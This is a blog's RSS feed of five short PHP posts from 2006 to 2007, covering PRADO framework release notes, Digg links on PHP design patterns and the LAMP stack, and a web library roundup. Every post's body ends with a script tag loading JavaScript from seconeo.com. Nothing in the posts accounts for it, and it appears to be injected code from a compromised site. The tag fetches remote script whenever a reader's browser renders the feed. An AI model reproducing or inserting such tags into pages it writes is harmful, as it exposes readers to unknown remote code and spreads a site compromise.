<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Adventures In Programming &#187; PHP</title>
	<atom:link href="http://www.adventuresinprogramming.com/tags/php/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.adventuresinprogramming.com</link>
	<description>Adventures in programming</description>
	<lastBuildDate>Tue, 08 Jan 2008 10:38:12 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>PRADO 3.1.0 Beta</title>
		<link>http://www.adventuresinprogramming.com/2007/04/22/prado-310-beta/</link>
		<comments>http://www.adventuresinprogramming.com/2007/04/22/prado-310-beta/#comments</comments>
		<pubDate>Sun, 22 Apr 2007 16:47:10 +0000</pubDate>
		<dc:creator>Kodewulf</dc:creator>
				<category><![CDATA[Development]]></category>
		<category><![CDATA[Frameworks]]></category>
		<category><![CDATA[Libraries]]></category>
		<category><![CDATA[Programming]]></category>
		<category><![CDATA[framework]]></category>
		<category><![CDATA[library]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[prado]]></category>

		<guid isPermaLink="false">http://adventuresinprogramming.com.s22377.gridserver.com/2007/04/22/prado-310-beta/</guid>
		<description><![CDATA[Version 3.1.0 of the PRADO PHP framework has gone into beta. PRADO is a component-based and event-driven programming framework for developing Web applications in PHP 5. The beta, as well as support forums and documentation can be found at the official PRADO website. We are proud to announce the BETA release of PRADO 3.1.0. This [...]]]></description>
			<content:encoded><![CDATA[<p>Version 3.1.0 of the PRADO PHP framework has gone into beta.  PRADO is a component-based and event-driven programming framework for developing Web applications in PHP 5. The beta, as well as support forums and documentation can be found at the official <a href="http://www.pradosoft.com" title="PRADO">PRADO</a> website.</p>
<blockquote><p>We are proud to announce the BETA release of PRADO 3.1.0. This is the result of nearly one year of hard work from the PRADO Group and represents a major milestone in the PRADO development. We hereby thank all PRADO developers and supporters. Please note, since this is a beta release, part of the code (especially those related with new features) may not be stable and are subject to change. Be very cautious if you intend to use this release in a production environment.</p>
<p>WHAT&#8217;S NEW IN THIS RELEASE<br />
- DB access: added three layers of database support, including PDO-based data access, Active Record and SqlMap.<br />
- Active controls: a list of AJAX-enabled Web controls.<br />
- Web services: added SOAP and JSON services.<br />
- TOutputCache: a control that caches selective parts of rendered HTML pages and can improve performance significantly.<br />
- TShellApplication: the base class for PRADO command line application<br />
- TDbCache: a generic cache module using database as persistent storage<br />
- TDbUserManager: a database-driven user manager module<br />
- TClientScriptLoader: a control for loading JavaScript libraries<br />
- Added five new demos, including chat, currency-converter, soap, sqlmap and time-tracker.<br />
- Many minor feature enhancements and bug fixes.</p></blockquote>
<p><script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.adventuresinprogramming.com/2007/04/22/prado-310-beta/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Digg: Five common PHP design patterns</title>
		<link>http://www.adventuresinprogramming.com/2006/07/19/digg-five-common-php-design-patterns/</link>
		<comments>http://www.adventuresinprogramming.com/2006/07/19/digg-five-common-php-design-patterns/#comments</comments>
		<pubDate>Wed, 19 Jul 2006 12:59:44 +0000</pubDate>
		<dc:creator>Kodewulf</dc:creator>
				<category><![CDATA[Development]]></category>
		<category><![CDATA[Digg]]></category>
		<category><![CDATA[Programming]]></category>
		<category><![CDATA[design pattern]]></category>
		<category><![CDATA[PHP]]></category>

		<guid isPermaLink="false">http://adventuresinprogramming.com.s22377.gridserver.com/2006/07/19/digg-five-common-php-design-patterns/</guid>
		<description><![CDATA[Digg: Five common PHP design patterns This article explains five widely used design patterns in PHP with sample code to demonstrate each pattern. Intermediate level.]]></description>
			<content:encoded><![CDATA[<p><a href="http://digg.com/programming/Five_common_PHP_design_patterns" title="Five common PHP design patterns">Digg: Five common PHP design patterns</a></p>
<blockquote><p>This article explains five widely used design patterns in PHP with sample code to demonstrate each pattern. Intermediate level.</p></blockquote>
<p><script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.adventuresinprogramming.com/2006/07/19/digg-five-common-php-design-patterns/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Digg: Open-source LAMP a beacon to developers</title>
		<link>http://www.adventuresinprogramming.com/2006/07/15/digg-open-source-lamp-a-beacon-to-developers/</link>
		<comments>http://www.adventuresinprogramming.com/2006/07/15/digg-open-source-lamp-a-beacon-to-developers/#comments</comments>
		<pubDate>Sun, 16 Jul 2006 03:39:59 +0000</pubDate>
		<dc:creator>Kodewulf</dc:creator>
				<category><![CDATA[Development]]></category>
		<category><![CDATA[Digg]]></category>
		<category><![CDATA[Programming]]></category>
		<category><![CDATA[apache]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[mysql]]></category>
		<category><![CDATA[perl]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[python]]></category>

		<guid isPermaLink="false">http://adventuresinprogramming.com.s22377.gridserver.com/2006/07/15/digg-open-source-lamp-a-beacon-to-developers/</guid>
		<description><![CDATA[Digg: Open-source LAMP a beacon to developers The so-called LAMP stack of open-source software&#8211;which includes the Linux operating system, Apache Web server, MySQL database and scripting languages PHP, Perl or Python&#8211;is pushing its way into mainstream corporate computing.]]></description>
			<content:encoded><![CDATA[<p><a href="http://digg.com/programming/Open-source_LAMP_a_beacon_to_developers" title="Digg: Open-source LAMP a beacon to developers">Digg: Open-source LAMP a beacon to developers</a></p>
<blockquote><p>The so-called LAMP stack of open-source software&#8211;which includes the Linux operating system, Apache Web server, MySQL database and scripting languages PHP, Perl or Python&#8211;is pushing its way into mainstream corporate computing.</p></blockquote>
<p><script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.adventuresinprogramming.com/2006/07/15/digg-open-source-lamp-a-beacon-to-developers/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Top 10 Web Developer Libraries</title>
		<link>http://www.adventuresinprogramming.com/2006/06/18/top-10-web-developer-libraries/</link>
		<comments>http://www.adventuresinprogramming.com/2006/06/18/top-10-web-developer-libraries/#comments</comments>
		<pubDate>Sun, 18 Jun 2006 09:12:07 +0000</pubDate>
		<dc:creator>Kodewulf</dc:creator>
				<category><![CDATA[Development]]></category>
		<category><![CDATA[Frameworks]]></category>
		<category><![CDATA[Libraries]]></category>
		<category><![CDATA[Programming]]></category>
		<category><![CDATA[ajax]]></category>
		<category><![CDATA[css]]></category>
		<category><![CDATA[Javascript]]></category>
		<category><![CDATA[library]]></category>
		<category><![CDATA[PHP]]></category>

		<guid isPermaLink="false">http://adventuresinprogramming.com.s22377.gridserver.com/2006/06/18/top-10-web-developer-libraries/</guid>
		<description><![CDATA[Top 10 web dev libraries I decided to make a list of the top libraries that I have come across or that I personally use. Libraries can be a web developers best friend. They are great resources to learn from and can save hours and hours of time. These libraries include JavaScript, Ajax, Colors, PHP, [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.cameronolthuis.com/2006/06/top-10-web-developer-libraries/" title="Top 10 web dev libraries"><br />
Top 10 web dev libraries</a></p>
<blockquote><p>I decided to make a list of the top libraries that I have come across or that I personally use. Libraries can be a web developers best friend. They are great resources to learn from and can save hours and hours of time. These libraries include JavaScript, Ajax, Colors, PHP, and CSS. These should be in any web developers bookmarks, so go ahead and look through these libraries and bookmark your favorite ones. The list is in no particular order.</p></blockquote>
<p><script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.adventuresinprogramming.com/2006/06/18/top-10-web-developer-libraries/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>PRADO 3.0.1 released</title>
		<link>http://www.adventuresinprogramming.com/2006/06/13/prado-301-released/</link>
		<comments>http://www.adventuresinprogramming.com/2006/06/13/prado-301-released/#comments</comments>
		<pubDate>Tue, 13 Jun 2006 13:35:25 +0000</pubDate>
		<dc:creator>Kodewulf</dc:creator>
				<category><![CDATA[Development]]></category>
		<category><![CDATA[Frameworks]]></category>
		<category><![CDATA[Libraries]]></category>
		<category><![CDATA[Programming]]></category>
		<category><![CDATA[framework]]></category>
		<category><![CDATA[library]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[prado]]></category>

		<guid isPermaLink="false">http://adventuresinprogramming.com.s22377.gridserver.com/2006/06/13/prado-301-released/</guid>
		<description><![CDATA[From the PRADO development team: We are pleased to announce that PRADO version 3.0.1 is formally released! Version 3.0.1 contains about 10 bug fixes and many small enhancements. It also includes a complete weblog demo which should be a good starting point for PRADO users to develop complex Web applications. A few supporting components are [...]]]></description>
			<content:encoded><![CDATA[<p>From the <a href="http://www.pradosoft.com" title="PRADO">PRADO</a> development team:</p>
<blockquote><p>We are pleased to announce that PRADO version 3.0.1 is formally released!</p>
<p>Version 3.0.1 contains about 10 bug fixes and many small enhancements. It also includes a complete weblog demo which should be a good starting point for PRADO users to develop complex Web applications. A few supporting components are also added in this release.</p>
<p>PRADO v3.0.1 may be downloaded at http://www.pradosoft.com/download/.</p></blockquote>
<p><script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.adventuresinprogramming.com/2006/06/13/prado-301-released/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
